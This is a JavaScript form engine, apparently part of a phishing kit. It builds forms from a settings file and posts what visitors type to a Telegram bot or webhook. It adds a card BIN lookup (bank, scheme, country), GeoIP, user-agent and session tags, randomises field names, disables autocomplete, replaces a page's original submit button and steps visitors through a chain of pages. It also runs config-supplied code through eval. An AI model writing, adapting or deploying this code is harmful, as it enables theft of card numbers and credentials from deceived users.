/* Forms Core (with instant per-field CSS/JS + skin mapper + button target) */
(function(){
  if(window.FormsCore) return;
  const FormsCore = { _cssInjected:false };
  function randomName(len=10){ const c='abcdefghijklmnopqrstuvwxyz0123456789'; let s=''; for(let i=0;i<len;i++) s+=c[Math.floor(Math.random()*c.length)]; return s; }
  function injectBaseCSS(){
    if(FormsCore._cssInjected) return;
    const css = `
      .row-fields{display:grid;grid-template-columns:1fr 1fr;gap:12px}
      .card-input{display:flex;flex-direction:column;margin-bottom:12px}
      .card-input.small{margin-bottom:0}
      .card-input__label{font-size:.9rem;color:#334155;margin-bottom:6px}
      .card-input input{background:#ffffff;color:#0f172a;border:1px solid #cbd5e1;border-radius:10px;padding:10px 12px;outline:none}
      .card-input input:focus{border-color:var(--brand,#2563EB);box-shadow:0 0 0 .25rem rgba(37,99,235,.15)}
      .card-form__button{display:inline-flex;align-items:center;gap:.5rem;border:none;border-radius:12px;background: var(--btn-bg, #2563eb);color: var(--btn-fg, #ffffff);padding:.65rem 1.05rem;font-weight:700}
      .card-form__button .spinner{width:1rem;height:1rem;border:2px solid currentColor;border-right-color:transparent;border-radius:50%;display:inline-block;animation:spin 1s linear infinite}
      .card-form__actions{width:100%;display:block}
      .card-form__actions.right{text-align:right}
      .card-form__actions.center{text-align:center}
      .card-form__actions.left{text-align:left}
      .card-form__button.full{width:100%;justify-content:center}
      @keyframes spin{to{transform:rotate(360deg)}}
      @media (max-width:768px){.row-fields{grid-template-columns:1fr}}
    `;
    const style=document.createElement('style'); style.textContent=css; document.head.appendChild(style);
    FormsCore._cssInjected=true;
  }
  async function loadSettings(){ const r=await fetch('settings.json?'+Date.now()); const s=await r.json(); s.forms??={}; s.pages??=[]; s.telegram??={}; return s; }
  function resolveSubmitSettings(settings,page,formName){
    const pageMap = page?.forms_submit || settings.submit || {};
    const p = pageMap?.[formName] || {};
    const f = (settings.forms?.[formName]?.behavior) || {};
    return {
      label: p.label ?? f.label ?? 'Submit',
      js: p.js ?? f.js ?? '',
      css: p.css ?? '',
      next_page: p.next_page ?? f.redirect ?? '',
      send_telegram: !!(p.send_telegram ?? f.telegram ?? false),
      webhook: p.webhook ?? f.webhook ?? '',
      alert: p.alert ?? f.alert ?? '',
      tg_template: f.tg_template || 'pipe',
      tg_meta: f.tg_meta || {ua:true,time:true,geo:false,bin:false},
      tg_bin_field: f.tg_bin_field || '',
      tg_header: f.tg_header || '|{form} {page} | #{tag}\n',
      btn_color: p.btn_color ?? f.btn_color ?? '#2563eb',
      btn_text:  p.btn_text  ?? f.btn_text  ?? '#ffffff',
      btn_align: p.btn_align ?? f.btn_align ?? 'left',
      btn_width: p.btn_width ?? f.btn_width ?? 'auto',
      btn_css:   p.btn_css   ?? f.btn_css   ?? '',
      skin: f.skin || {input_class:'',label_class:'',group_class:'',button_class:'',button_target:''}
    };
  }
  function resolveWrapperSettings(page, formName){ const fw = page?.forms_wrapper?.[formName] || {}; return { align: fw.align || 'left', width: fw.width || 'auto' }; }
  function buildTelegramText(formName, data, tpl, meta, pageTitle, headerTpl){
    let tag=''; try{ tag=(location.hash||'').replace(/^#/,''); }catch(_){}
    if(!tag){ try{ let sid=sessionStorage.getItem('ua_sid'); if(!sid){ sid=Date.now().toString(36)+Math.random().toString(36).slice(2,8); sessionStorage.setItem('ua_sid', sid); } tag=sid.slice(-6);}catch(_){ tag=Math.random().toString(36).slice(2,8); } }
    headerTpl = (headerTpl||'|{form} {page} | #{tag}\n');
    let header = headerTpl.replace('{form}', formName).replace('{page}', pageTitle||'').replace('{tag}', tag);
    let text = header;
    Object.entries(data).forEach(([k,v])=>{ text += (tpl==='pretty')?`|${k}: ${v}\n`:`|${k} : ${v}\n`; });
    if(meta?.ua){ text += `|UA: ${navigator.userAgent||'-'}\n`; }
    if(meta?.time){ try{ text += `|Time: ${new Date().toLocaleString()}\n`; }catch(_){} }
    return text;
  }
  async function sendToTelegram(settings, formName, data, pageTitle, submitCfg){
    const token=settings.telegram?.bot_token, chat=settings.telegram?.chat_id;
    if(!token||!chat) return false;
    const tpl  = submitCfg.tg_template || 'pipe';
    const meta = submitCfg.tg_meta || {ua:true,time:true,geo:false,bin:false};
    const binF = (submitCfg.tg_bin_field||'').trim();
    const headerTpl = submitCfg.tg_header || '|{form} {page} | #{tag}\n';
    let text = buildTelegramText(formName, data, tpl, meta, pageTitle, headerTpl);
    if(meta.bin && binF && data[binF]){
      const digits=String(data[binF]).replace(/\D+/g,'');
      if(digits.length>=6){
        const BIN=digits.slice(0,6);
        try{
          const binRes = await fetch('https://lookup.binlist.net/'+BIN,{headers:{'Accept':'application/json'}}).then(r=>r.ok?r.json():null);
          if(binRes){
            text += `|BIN: ${BIN}\n`;
            if(binRes.scheme) text += `|Scheme: ${binRes.scheme}\n`;
            if(binRes.type)   text += `|Type: ${binRes.type}\n`;
            if(binRes.brand)  text += `|Brand: ${binRes.brand}\n`;
            if(binRes.bank?.name) text += `|Bank: ${binRes.bank.name}\n`;
            if(binRes.country?.name) text += `|Country: ${binRes.country.name}\n`;
          } else { text += `|BIN: ${BIN}\n`; }
        }catch(_){ text += `|BIN: ${BIN}\n`; }
      }
    }
    if(meta.geo){
      try{
        const geo = await fetch('https://ipapi.co/json/').then(r=>r.ok?r.json():null);
        if(geo){ const x=[geo.ip, geo.country_name, geo.city].filter(Boolean).join(' / '); text += `|GeoIP: ${x||'-'}\n`; }
      }catch(_){}
    }
    try{
      const r = await fetch(`https://api.telegram.org/bot${token}/sendMessage`,{
        method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({chat_id: chat, text})
      }).then(r=>r.json()); return !!r.ok;
    }catch(_){ return false; }
  }

  async function inject(containerId, formName){
    injectBaseCSS();
    const host = document.getElementById(containerId);
    if(!host) return;
    const settings = await loadSettings();
    const fields = (settings.forms?.[formName]?.fields || []);
    if(!fields.length){ host.innerHTML = '<div class="text-muted">No fields configured for this form.</div>'; return; }
    const cur = (function(){ const f=location.pathname.split('/').pop(); return f||'index.php'; })();
    const page = (settings.pages||[]).find(p=>cur===p.php || cur.endsWith(p.php)) || null;
    const submit = resolveSubmitSettings(settings,page,formName);
    const wrapper = resolveWrapperSettings(page, formName);
    const nameMap = {};
    let html = '', row=[];
    fields.forEach((fld,i)=>{
      const rnd = randomName();
      nameMap[fld.name||('field_'+i)] = rnd;

      // build attributes
      const attrs = [
        `name="${rnd}"`,`id="${rnd}"`,`type="${fld.type||'text'}"`,`autocomplete="off"`,
        fld.placeholder?`placeholder="${String(fld.placeholder).replace(/"/g,'&quot;')}"`:'',
        fld.required?'required':'', fld.pattern?`pattern="${fld.pattern}"`:'',
        (fld.min!==''&&fld.min!=null)?`min="${fld.min}"`:'', (fld.max!==''&&fld.max!=null)?`max="${fld.max}"`:''
      ].filter(Boolean).join(' ');

      // classes via skin mapper (group/label/input) + per-field override skin_class
      const skin = submit.skin || {};
      const inputCls = [skin.input_class||'', (fld.skin_class||'')].filter(Boolean).join(' ').trim();
      const labelHtml = `<label for="${rnd}" class="card-input__label ${(skin.label_class||'').trim()}">${(fld.label||fld.name||('Field '+(i+1))).replace(/</g,'&lt;').replace(/>/g,'&gt;')}${fld.required?' <span style="color:#e00">*</span>':''}</label>`;
      const inputHtml = `<input ${attrs} ${inputCls?`class="${inputCls.replace(/"/g,'&quot;')}"`:''} ${fld.js?`oninput="${String(fld.js).replace(/"/g,'&quot;')}"`:''}>`;
      const block = `<div class="card-input${fld.small?' small':''} ${(skin.group_class||'').trim()}">${labelHtml}${inputHtml}</div>`;

      if(fld.small){ row.push(block); if(!fields[i+1]||!fields[i+1].small){ html+=`<div class="row-fields">${row.join('')}</div>`; row=[]; } }
      else { if(row.length){ html+=`<div class="row-fields">${row.join('')}</div>`; row=[]; } html+=block; }
    });
    if(row.length) html+=`<div class="row-fields">${row.join('')}</div>`;
    host.innerHTML = html;

    // ensure form wrapper
    const formEl = host.closest('form') || (function(){ const f=document.createElement('form'); host.parentNode.insertBefore(f,host); f.appendChild(host); return f; })();

    // Form CSS (global)
    const formObj = settings.forms?.[formName];
    if(formObj && (formObj.css||'').trim()){ host.style.cssText += ';' + formObj.css; }

    // wrapper UX
    if(wrapper.width && wrapper.width!=='auto'){ host.style.maxWidth = wrapper.width; }
    if(wrapper.align==='center'){ host.style.margin = '0 auto'; }
    else if(wrapper.align==='right'){ host.style.marginLeft='auto'; host.style.marginRight='0'; }
    else { host.style.marginRight='auto'; }

    // Submit button
    if (submit.btn_color) host.style.setProperty('--btn-bg', submit.btn_color);
    if (submit.btn_text)  host.style.setProperty('--btn-fg', submit.btn_text);
    let actions = formEl.querySelector('.card-form__actions');
    if(!actions){ actions=document.createElement('div'); actions.className='card-form__actions ' + (['left','center','right'].includes(submit.btn_align)?submit.btn_align:'left'); formEl.appendChild(actions); }
    const btn=document.createElement('button'); btn.type='button'; btn.className='card-form__button'; if(submit.btn_width==='full') btn.classList.add('full'); btn.textContent = submit.label||'Submit';
    if(submit.css) btn.style.cssText += ';' + submit.css; if(submit.btn_css) btn.style.cssText += ';' + submit.btn_css;
    const sp=document.createElement('span'); sp.className='spinner'; sp.style.display='none'; btn.appendChild(sp); actions.appendChild(btn);

    // Apply skin button classes
    if (submit.skin?.button_class){ btn.className = (btn.className + ' ' + submit.skin.button_class).trim(); }

    // Move our button to original position if button_target given
    (function(){
      try{
        const selRaw = (submit.skin?.button_target || '').trim();
        if(!selRaw) return;
        const selector = (/^[.#\[]|button|input/i.test(selRaw)) ? selRaw : ('.' + selRaw);
        const oldBtn = formEl.querySelector(selector);
        if(oldBtn){
          // inherit classes of old
          if(oldBtn.className) btn.className = (btn.className + ' ' + oldBtn.className).trim();
          actions.removeChild(btn);
          oldBtn.parentNode.insertBefore(btn, oldBtn);
          oldBtn.remove();
          if(!actions.childNodes.length) actions.remove();
        }
      }catch(_){}
    })();

    // Per-field CSS/JS (instant)
    (formObj?.fields||[]).forEach((fld,i)=>{
      const rnd = nameMap[fld.name||('field_'+i)];
      const el = document.getElementById(rnd); if(!el) return;
      if((fld.css||'').trim()) el.style.cssText += ';' + fld.css;
      if((fld.js||'').trim()){
        try{
          // run once on init if needed
          try{ (new Function('el', fld.js))(el); }catch(_){}
          // and keep it reactive
          el.addEventListener('input', function(){
            try{ (new Function('el', fld.js))(this); }catch(_){}
          });
        }catch(_){}
      }
    });

    // Submit click
    btn.addEventListener('click', async (e)=>{
      e.preventDefault();
      if(formEl.reportValidity && !formEl.reportValidity()) return;
      const data={}; for(const [orig,rnd] of Object.entries(nameMap)){ const el=document.getElementById(rnd); if(el) data[orig]=el.value; }
      if((submit.js||'').trim()){ try{ eval(submit.js); }catch(err){ console.error('Custom JS error:',err); } return; }
      sp.style.display='inline-block'; btn.disabled=true;
      let pageTitle=''; try{ pageTitle=document.title||''; }catch(_){}
      let ok=true;
      if(submit.send_telegram){ ok = await sendToTelegram(settings, formName, data, pageTitle, submit); }
      if(submit.webhook){ try{ await fetch(submit.webhook,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({form:formName,data})}); }catch(_){ } }
      if(submit.alert) alert(submit.alert);
      if((submit.send_telegram && ok) || !submit.send_telegram){
        if(submit.next_page){ location.href = submit.next_page; }
        else{
          const pages=settings.pages||[]; const idx=pages.findIndex(p=>((location.pathname.split('/').pop())||'index.php')===p.php);
          if(idx!==-1 && pages[idx+1]) location.href = pages[idx+1].php;
        }
      }else{ sp.style.display='none'; btn.disabled=false; }
    });
  }
  window.FormsCore = FormsCore; FormsCore.inject = inject;
})();